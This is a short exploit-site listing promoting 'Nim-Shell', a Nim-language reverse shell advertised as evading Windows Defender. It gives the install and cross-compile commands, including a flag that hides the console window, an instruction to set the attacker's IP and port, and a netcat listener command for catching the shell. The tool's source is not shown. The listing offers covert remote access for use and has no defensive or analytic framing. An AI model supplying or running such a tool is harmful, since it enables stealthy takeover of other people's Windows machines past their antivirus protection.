## https://sploitus.com/exploit?id=KITPLOIT:6860470207008060819

Reverse shell that can bypass windows defender detection
$ apt install nim
# Compilation
nim c -d:mingw --app:gui nimshell.nim

Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.

# and listen
$ nc -nvlp 4444
**Download Nim-Shell**